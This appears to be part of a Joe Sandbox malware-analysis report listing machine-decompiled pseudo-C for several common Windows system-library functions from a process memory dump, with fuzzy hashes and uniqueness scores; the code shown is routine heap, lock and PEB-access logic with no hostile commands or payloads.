Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908be3091c246a1b4ffe0aad993fcd1038b804aabc076e2c8fa3192a57c109ce
Instruction ID: 601287c89da93c23aedadbdbe70831149babd6c547285dd67b7b93631f4d9b94
Opcode Fuzzy Hash: 908be3091c246a1b4ffe0aad993fcd1038b804aabc076e2c8fa3192a57c109ce
Instruction Fuzzy Hash: A311E532700550ABDB19DB299C81A6F7267DBC5774B29413DEA128B2A1D930F802C290

Uniqueness

Uniqueness Score: -1.00%

Function 04D7A464 Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04D7A464(void* __ebx, void* __ecx, intOrPtr _a4, char* _a8) {
				char _v8;
				signed int _v12;
				char* _t26;
				void* _t31;
				unsigned int _t33;
				intOrPtr _t49;

				_t31 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t49 = _a4;
				_v12 =  *(_t49 + 0xc) & 0xffff0000;
				_t33 =  *(_t49 + 0x10);
				_t44 = 1 << (_t33 >> 0x00000002 & 0x0000003f);
				_t5 = _t44 - 1; // 0x0
				_t6 = _t44 - 1; // 0x0
				_t57 = _a8;
				_v8 = ((_t33 >> 0x00000001 & 1) + (_t33 >> 0xc) << 0xc) - 1 + (1 << (_t33 >> 0x00000002 & 0x0000003f)) - (_t5 + ((_t33 >> 0x00000001 & 1) + (_t33 >> 0x0000000c) << 0x0000000c) & _t6);
				E04D78845( &_v12,  &_v8, 0x8000,  *_a8,  *((intOrPtr*)(_a8 + 4)));
				if(E04CC3C40() == 0) {
					_t26 = 0x7ffe0388;
				} else {
					_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t26 != 0) {
					E04D6DA30(_t31, _t57, _v12, _v8);
				}
				return E04D79629(_t49,  *_t57,  *((intOrPtr*)(_t57 + 4)));
			}

0x04d7a464
0x04d7a469
0x04d7a46a
0x04d7a46d
0x04d7a478
0x04d7a47b
0x04d7a492
0x04d7a499
0x04d7a49c
0x04d7a4a6
0x04d7a4b3
0x04d7a4c0
0x04d7a4cc
0x04d7a4de
0x04d7a4ce
0x04d7a4d7
0x04d7a4d7
0x04d7a4e6
0x04d7a4f0
0x04d7a4f0
0x04d7a504

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction ID: 1f88a18f4716ce3b809916c4ba69195d455f962bb8f2e8776188ff8f957c3501
Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction Fuzzy Hash: 34110132A00918EFDB19CF54C805B9DB7B6EF84314F088269EC4A97740EA31FE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CE65D0 Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CE65D0() {
				unsigned int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t24;
				void* _t25;
				void* _t26;
				intOrPtr* _t27;
				intOrPtr _t28;
				unsigned int _t29;
				intOrPtr* _t30;
				unsigned int _t31;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t36;

				_t29 =  *( *[fs:0x18] + 0x24);
				_t32 = 0;
				_t27 = 0;
				_t35 = _t29 >> 0x00000002 & 0x0000000f;
				_v8 = _t29;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t22 = 0x4da6724 + _t35 * 8;
				_v12 = 0x4da6724 + _t35 * 8;
				L04CC2330(0x4da6724 + _t35 * 8, _t22);
				_t24 =  *((intOrPtr*)(0x4da6720 + _t35 * 8));
				if(_t24 == 0) {
					L4:
					_t25 = E04CC24D0(_v12);
					if(_t32 != 0) {
						_t28 = _v16;
						do {
							_t36 =  *((intOrPtr*)(_t32 + 4));
							_t26 = E04CC3BC0(_t28, 0, _t32);
							_t32 = _t36;
						} while (_t36 != 0);
						return _t26;
					}
					return _t25;
				}
				_t31 = _v8;
				do {
					_t30 =  *((intOrPtr*)(_t24 + 4));
					if( *_t24 == _t31) {
						if(_t27 == 0) {
							 *((intOrPtr*)(0x4da6720 + _t35 * 8)) = _t30;
						} else {
							 *((intOrPtr*)(_t27 + 4)) = _t30;
						}
						 *((intOrPtr*)(_t24 + 4)) = _t32;
						_t32 = _t24;
						_t24 = _t27;
					}
					_t27 = _t24;
					_t24 = _t30;
				} while (_t30 != 0);
				goto L4;
			}

0x04ce65e1
0x04ce65e4
0x04ce65f1
0x04ce65f3
0x04ce65f6
0x04ce65fc
0x04ce65ff
0x04ce6607
0x04ce660a
0x04ce660f
0x04ce6618
0x04ce662c
0x04ce662f
0x04ce6636
0x04ce6656
0x04ce6659
0x04ce6659
0x04ce6660
0x04ce6665
0x04ce6667
0x00000000
0x04ce6659
0x04ce663c
0x04ce663c
0x04ce661a
0x04ce661d
0x04ce661d
0x04ce6622
0x04ce663f
0x04ce664d
0x04ce6641
0x04ce6641
0x04ce6641
0x04ce6644
0x04ce6647
0x04ce6649
0x04ce6649
0x04ce6624
0x04ce6626
0x04ce6628
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08086e0b51751ec0f41701582e5777e34fc9a4081891b084d4d23294aa7574cc
Instruction ID: dab99ce47a0fe680900695bdc9b22185d19e733bb243fe4fc759ea45ecf86b27
Opcode Fuzzy Hash: 08086e0b51751ec0f41701582e5777e34fc9a4081891b084d4d23294aa7574cc
Instruction Fuzzy Hash: 49118272F21244DBCB14CF5AD590A6ABBEAEBA4750F45407DD8059B310D734EE01DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04CB2E32 Relevance: .1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04CB2E32(intOrPtr _a4) {
				void* __ecx;
				signed int _t10;
				intOrPtr _t17;
				void* _t18;
				signed int _t27;
				signed int _t28;
				void* _t29;

				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if(E04D061D5() != 0) {
					_push(5);
				} else {
					_push(4);
				}
				_pop(_t28);
				_t27 = _t28;
				if( *0x4da6614 == 0) {
					L7:
					_t10 =  *0x4da67d8; // 0x0
					if(_t10 == 0) {
						_t10 = E04CEA965(0x4c81740, 1, 0x4da67d8);
					}
					_t29 = E04CB2EE8(0x4c86e30 + _t10 * 0x14, _t28, _a4, 0);
				} else {
					L04CB53C0(0x4da67d4);
					if( *0x4da6614 == 0) {
						E04CB52F0(_t18, 0x4da67d4);
						goto L7;
					} else {
						_t29 = E04CB2EE8(0x4c86e6c, _t27, _a4, 0);
						E04CB52F0(0x4c86e6c, 0x4da67d4);
					}
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t17;
					 *((char*)(_t29 + 0x48)) = 0;
				}
				return _t29;
			}

0x04cb2e44
0x04cb2e51
0x04cb2e57
0x04cb2e53
0x04cb2e53
0x04cb2e53
0x04cb2e60
0x04cb2e61
0x04cb2e63
0x04cb2ea1
0x04cb2ea1
0x04cb2ea8
0x04cb2eb7
0x04cb2eb7
0x04cb2ed1
0x04cb2e65
0x04cb2e6a
0x04cb2e76
0x04cb2e9c
0x00000000
0x04cb2e78
0x04cb2e8e
0x04cb2e90
0x04cb2e90
0x04cb2e76
0x04cb2ed5
0x04cb2ed7
0x04cb2eda
0x04cb2eda
0x04cb2ee5

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce0092088c35ee846bbee8f777727ae61593e6ba1beaca4669639aba420f718
Instruction ID: 415dbca257ca5f0bd36dbc5cb15b5c3fa4a58126513dfae318cb79d4596725e1
Opcode Fuzzy Hash: 7ce0092088c35ee846bbee8f777727ae61593e6ba1beaca4669639aba420f718
Instruction Fuzzy Hash: 561102327003A0EBF721A65BDC48BABA787DB40B59F0C009AA6C5A7690C975FC159AD1

Uniqueness

Uniqueness Score: -1.00%

Function 04D3CED0 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04D3CED0(signed int __ecx, signed int _a4) {
				signed int _t16;
				signed int _t18;
				signed char _t19;
				void* _t20;
				signed int _t26;
				signed int _t29;
				signed char _t30;
				signed int _t36;
				signed int _t39;

				_t29 = __ecx;
				_push(__ecx);
				_t26 = _a4;
				if((_t26 & 0xfffe7ffe) != 0) {
					L3:
					_t16 = 0xc000000d;
					L4:
					return _t16;
				}
				if((_t26 & 0x00000001) == 0) {
					_t15 = _t26 & 0x00018000;
					__eflags = (_t26 & 0x00018000) - 0x10000;
					if((_t26 & 0x00018000) != 0x10000) {
						goto L3;
					}
					L6:
					_t18 = L04CC2330(_t15, 0x4da69f0);
					asm("bt dword [0x4da6908], 0xf");
					_t30 = _t29 & 0xffffff00 | __eflags > 0x00000000;
					asm("bt ebx, 0xf");
					_t19 = _t18 & 0xffffff00 | __eflags >= 0x00000000;
					__eflags = _t19 & _t30;
					if((_t19 & _t30) == 0) {
						 *0x4da6908 = _t26;
						_t39 = 0;
						__eflags = 0;
					} else {
						_t39 = 0xc0000022;
					}
					_t20 = E04CC24D0(0x4da69f0);
					__eflags = _t39;
					if(_t39 >= 0) {
						L04CC2330(_t20, 0x4da67c4);
						_t36 = E04CED532(0x4da4fe4);
						E04CC24D0(0x4da67c4);
						__eflags = _t36;
						if(_t36 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
						}
					}
					_t16 = _t39;
					goto L4;
				}
				if((_t26 & 0x00010000) == 0) {
					goto L6;
				}
				goto L3;
			}

0x04d3ced0
0x04d3ced8
0x04d3ceda
0x04d3cee5
0x04d3cef4
0x04d3cef4
0x04d3cef9
0x04d3ceff
0x04d3ceff
0x04d3ceea
0x04d3cf04
0x04d3cf09
0x04d3cf0e
0x00000000
0x00000000
0x04d3cf10
0x04d3cf16
0x04d3cf1b
0x04d3cf23
0x04d3cf26
0x04d3cf2a
0x04d3cf2d
0x04d3cf2f
0x04d3cf38
0x04d3cf3e
0x04d3cf3e
0x04d3cf31
0x04d3cf31
0x04d3cf31
0x04d3cf41
0x04d3cf46
0x04d3cf48
0x04d3cf50
0x04d3cf60
0x04d3cf62
0x04d3cf67
0x04d3cf69
0x04d3cf78
0x04d3cf78
0x04d3cf69
0x04d3cf7d
0x00000000
0x04d3cf7d
0x04d3cef2
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60af261104a0e6e075487c2e2ef70817f52aa9720de0fcef6be86203d920b811
Instruction ID: 02d2814ff7904c6f3b35849c3aa46aa1e7aaa1c6fa29856cf726cf94bd8ea0bd
Opcode Fuzzy Hash: 60af261104a0e6e075487c2e2ef70817f52aa9720de0fcef6be86203d920b811
Instruction Fuzzy Hash: BF016D33A2520067E72196158C84BAB6229EB85FA9F19006AFD517B340DD28FC81D2E1

Uniqueness

Uniqueness Score: -1.00%

Function 04D3E461 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04D3E461(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v8;
				void* _t14;
				void* _t17;
				signed int* _t19;
				void* _t22;
				signed int _t30;
				signed int* _t32;
				signed int _t36;

				_t24 = __ecx;
				_push(__ecx);
				_t22 = __edx;
				_v8 = __ecx;
				_t32 = E04CB9630(_a4, __edx,  *_a8);
				if(_t32 == 0) {
					L10:
					_t14 = 0;
				} else {
					while(( *_t32 | _t32[1]) != 0) {
						_t36 = _t32[1];
						if(_t36 < 0 || _t36 <= 0 &&  *_t32 < 0) {
							L9:
							_t32 =  &(_t32[2]);
							if(_t32 != 0) {
								continue;
							} else {
								goto L10;
							}
						} else {
							_t17 = E04CB9630(_a4, _t22,  *_t32);
							if(_t17 == 0) {
								L13:
								_t14 = 0xc000008b;
							} else {
								_t7 = _t17 + 2; // 0x2
								_t30 = _t7;
								if(_t30 == 0) {
									goto L13;
								} else {
									_t19 = E04CC5D90(_t24,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 8);
									if(_t19 == 0) {
										_t14 = 0xc0000017;
									} else {
										_t24 = _t19;
										 *_t19 =  *_t19 & 0x00000000;
										_t19[1] = _t30;
										E04D3E5FE(_t19, _v8 + 8);
										goto L9;
									}
								}
							}
						}
						goto L11;
					}
					goto L10;
				}
				L11:
				return _t14;
			}

0x04d3e461
0x04d3e466
0x04d3e46f
0x04d3e471
0x04d3e47d
0x04d3e481
0x04d3e4db
0x04d3e4db
0x04d3e483
0x04d3e483
0x04d3e48a
0x04d3e48e
0x04d3e4d6
0x04d3e4d6
0x04d3e4d9
0x00000000
0x00000000
0x00000000
0x00000000
0x04d3e497
0x04d3e49d
0x04d3e4a4
0x04d3e4eb
0x04d3e4eb
0x04d3e4a6
0x04d3e4a6
0x04d3e4a6
0x04d3e4ab
0x00000000
0x04d3e4ad
0x04d3e4ba
0x04d3e4c1
0x04d3e4e4
0x04d3e4c3
0x04d3e4c6
0x04d3e4c8
0x04d3e4cb
0x04d3e4d1
0x00000000
0x04d3e4d1
0x04d3e4c1
0x04d3e4ab
0x04d3e4a4
0x00000000
0x04d3e48e
0x00000000
0x04d3e483
0x04d3e4dd
0x04d3e4e1

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
Instruction ID: b42cbe9927abd66304503a1d5f00ae61dd6a6f9f194abad63c7b7e1a7997cdcc
Opcode Fuzzy Hash: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
Instruction Fuzzy Hash: 2C11AC32601604EFEB319F44C840B5BBBE6FB88356F058468E9499B2A1E731FC40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CD270D Relevance: .1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E04CD270D(char __edx, intOrPtr _a4) {
				void* __ecx;
				void* _t8;
				intOrPtr* _t13;
				signed char* _t17;
				void* _t22;
				void* _t28;
				char _t29;

				_push(0x4da3390);
				_t29 = __edx;
				_t8 = E04CBE740(_t22);
				_t23 = _a4;
				_t28 = _t8;
				if(_a4 < 0) {
					E04CEC98F(_t23, 0x14a2, _t29, 0);
				}
				if(E04CC3C40() != 0) {
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E04CC3C40() == 0) {
							_t17 = 0x7ffe0385;
						} else {
							_t17 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t17 & 0x00000020) != 0) {
							E04D30227(0x14a2, 0, 0, _t29, 0, 0);
						}
					}
				}
				return _t28;
			}

0x04cd2716
0x04cd271b
0x04cd271d
0x04cd2722
0x04cd2727
0x04cd272b
0x04d1aaf0
0x04d1aaf0
0x04cd2738
0x04d1ab03
0x04cd273e
0x04cd273e
0x04cd273e
0x04cd2745
0x04d1ab1a
0x04d1ab27
0x04d1ab39
0x04d1ab29
0x04d1ab32
0x04d1ab32
0x04d1ab41
0x04d1ab52
0x04d1ab52
0x04d1ab41
0x04d1ab1a
0x04cd2752

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6677cef1d79fb9080e018d7924f5e0a1282b2fe2d8fb6d60a4f5424359832fb
Instruction ID: 56ca787453cdd00dd2d203850305cba4888f83292d59163173d28bd6ae729616
Opcode Fuzzy Hash: e6677cef1d79fb9080e018d7924f5e0a1282b2fe2d8fb6d60a4f5424359832fb
Instruction Fuzzy Hash: 2D016631345A80ABE325966AE884F67778EEF80354F0A00A9FD018B260EA24FC018221

Uniqueness

Uniqueness Score: -1.00%

Function 04CB45B0 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CB45B0(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t18;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t30;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t34;

				_t26 = _a4;
				if(_t26 == 0 || _a8 == 0) {
					L9:
					E04D84A6D(_t26, _t27, _t30, _t32, _t33);
					return 0xc000000d;
				}
				_t32 = _a16;
				if(_t32 != 0) {
					if(( *(_t32 + 0x1c) & 0xfffffffc) == 0) {
						goto L3;
					} else {
						goto L9;
					}
					L11:
				}
				L3:
				if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L9;
				}
				_t18 =  *0x4da6644; // 0x0
				_t34 = E04CC5D90(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t18 + 0x00100000 | 0x00000008, 0xe0);
				if(_t34 == 0) {
					return 0xc0000017;
				}
				 *((intOrPtr*)(_t34 + 0x6c)) = _v0;
				_t25 = E04CB48B7(0, _a12, _t32, 0x4c81090, 0x4c810a0);
				if(_t25 >= 0) {
					 *((intOrPtr*)(_t34 + 0x30)) = _a8;
					 *_t26 = _t34;
					return _t25;
				}
				return _t25;
				goto L11;
			}

0x04cb45b7
0x04cb45be
0x04cb463d
0x04cb463d
0x00000000
0x04cb4642
0x04cb45c6
0x04cb45cb
0x04cb463b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04cb463b
0x04cb45cd
0x04cb45da
0x00000000
0x00000000
0x04cb45dc
0x04cb45fd
0x04cb4601
0x00000000
0x04cb4649
0x04cb4618
0x04cb461b
0x04cb4622
0x04cb4627
0x04cb462a
0x00000000
0x04cb462a
0x04cb4631
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97b9f28e024ea1d77f2a9bbe146e1581bdebc2c1c7c168206640d20363c9ca9
Instruction ID: e0402db41da8413a9238cf95839715793351d2b33b90541ace894daa521a3194
Opcode Fuzzy Hash: e97b9f28e024ea1d77f2a9bbe146e1581bdebc2c1c7c168206640d20363c9ca9
Instruction Fuzzy Hash: BA110672608354AFD725DF59D944B9677E6EB44768F044119F8848B242D770FD00CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 04CDAF72 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04CDAF72(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _t12;
				void* _t14;
				void* _t22;
				signed int _t28;
				intOrPtr _t31;
				void* _t33;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t12 =  *((intOrPtr*)(_t31 + 0x48));
				_v8 = _t12;
				if(_t12 == 0) {
					_t28 = 4;
					_t14 = E04CDAD20(0,  &_v12, _t28);
					if(_t14 >= 0) {
						_t22 = _v12;
						goto L3;
					}
				} else {
					_t28 = E04CDBA17(_t12, 1);
					_t23 = _t28;
					_t22 = E04CDB9FA(_t28);
					if(_t22 == 0) {
						_t14 = 0xc000009a;
					} else {
						E04CF88C0(_t22, _v8, _t28);
						_t33 = _t33 + 0xc;
						L3:
						 *((intOrPtr*)(_t31 + 0x294)) =  *((intOrPtr*)(_t31 + 0x294)) + 1;
						 *((intOrPtr*)(_t31 + 0x48)) = _t22;
						 *((intOrPtr*)(_t31 + 0x290)) = _t28;
						E04CF8F40(0x4da63a0, 0, 0x234);
						E04CDAFF1(_t23);
						_t14 = 0;
					}
				}
				return _t14;
			}

0x04cdaf72
0x04cdaf77
0x04cdaf78
0x04cdaf82
0x04cdaf85
0x04cdaf88
0x04cdaf8d
0x04d1e261
0x04d1e269
0x04d1e270
0x04d1e276
0x00000000
0x04d1e276
0x04cdaf93
0x04cdaf9d
0x04cdaf9f
0x04cdafa6
0x04cdafaa
0x04cdafe8
0x04cdafac
0x04cdafb1
0x04cdafb6
0x04cdafb9
0x04cdafb9
0x04cdafcb
0x04cdafce
0x04cdafd4
0x04cdafdc
0x04cdafe1
0x04cdafe1
0x04cdafaa
0x04cdafe7

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c41f98cff9e83438e534b5472c875c8a7d33c5ccfa8b518e040c243419e1354
Instruction ID: 4e163544333f569c8e16b6f68cc2bb83e3610d7ca238bce4b9c2206519c0724a
Opcode Fuzzy Hash: 3c41f98cff9e83438e534b5472c875c8a7d33c5ccfa8b518e040c243419e1354
Instruction Fuzzy Hash: A101B9B27003406BE714A76A9C85F6FB7FADBC4758F040469E70AD7141E775FD019660

Uniqueness

Uniqueness Score: -1.00%

Function 04CE6540 Relevance: .1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04CE6540(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t19;
				intOrPtr* _t23;
				intOrPtr _t24;
				void* _t25;
				signed int* _t27;
				signed int _t28;
				intOrPtr _t29;
				signed int _t30;

				_t25 = __ecx;
				_t29 =  *[fs:0x18];
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				L04CB53C0(0x4da6718);
				_t3 = _t29 + 0x2c; // 0x44
				_t27 = _t3;
				_t30 =  *_t27;
				if(_t30 != 0) {
					asm("lock dec dword [0x4da5c80]");
					 *_t27 =  *_t27 & 0x00000000;
				}
				E04CB52F0(_t25, 0x4da6718);
				if(_t30 != 0 && _t30 != _t27) {
					_t4 = _t30 - 8; // 0x10
					_t23 = _t4;
					_t28 = 0;
					_t19 =  *_t23;
					_v16 = _t23;
					_v12 = _t19;
					if(_t19 != 0) {
						_t24 = _v8;
						do {
							_t26 =  *((intOrPtr*)(_t30 + _t28 * 4));
							if( *((intOrPtr*)(_t30 + _t28 * 4)) != 0) {
								E04CC3BC0(_t24, 0,  *((intOrPtr*)(_t26 - 4)));
								_t19 = _v12;
							}
							_t28 = _t28 + 1;
						} while (_t28 < _t19);
						_t23 = _v16;
					}
					E04CC3BC0(_v8, 0, _t23);
				}
				return E04CE65D0();
			}

0x04ce6540
0x04ce654a
0x04ce6561
0x04ce6564
0x04ce6569
0x04ce6569
0x04ce656c
0x04ce6570
0x04ce6572
0x04ce6579
0x04ce6579
0x04ce657d
0x04ce6584
0x04ce658a
0x04ce658a
0x04ce658d
0x04ce658f
0x04ce6591
0x04ce6594
0x04ce6599
0x04ce659b
0x04ce659e
0x04ce659e
0x04ce65a3
0x04ce65ab
0x04ce65b0
0x04ce65b0
0x04ce65b3
0x04ce65b4
0x04ce65b8
0x04ce65b8
0x04ce65c1
0x04ce65c1
0x04ce65cf

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2256f11f37b816185b9f97d98adebd59c335ab3a4846a9075115784be18b758e
Instruction ID: 70789ecd2c3e2dd1d97df7615bf47b39e73a552625aaf6e55c94ed8e388676df
Opcode Fuzzy Hash: 2256f11f37b816185b9f97d98adebd59c335ab3a4846a9075115784be18b758e
Instruction Fuzzy Hash: FA11A572F11714ABDB21DF5AD980B6EF7BAEFA8704F900455D90167244D770FE019B90

Uniqueness

Uniqueness Score: -1.00%

Function 04CDE45E Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CDE45E() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04CC3C40();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04CC3C40() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04CC3C40() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04CC3C40() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04cde463
0x04cde468
0x04cde474
0x04d1f7e1
0x04cde47a
0x04cde47a
0x04cde47a
0x04cde47f
0x04cde484
0x04d1f7ef
0x04d1f801
0x04d1f7f1
0x04d1f7fa
0x04d1f7fa
0x04d1f806
0x00000000
0x04d1f808
0x00000000
0x04d1f808
0x04cde48a
0x04cde48a
0x04cde491
0x04d1f816
0x04d1f816
0x04cde49a
0x04d1f82a
0x00000000
0x00000000
0x04d1f837
0x04d1f842
0x04d1f842
0x04d1f84b
0x00000000
0x00000000
0x04d1f851
0x00000000
0x04cde4a0
0x04cde4a0
0x00000000
0x04cde4a0
0x04cde49a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
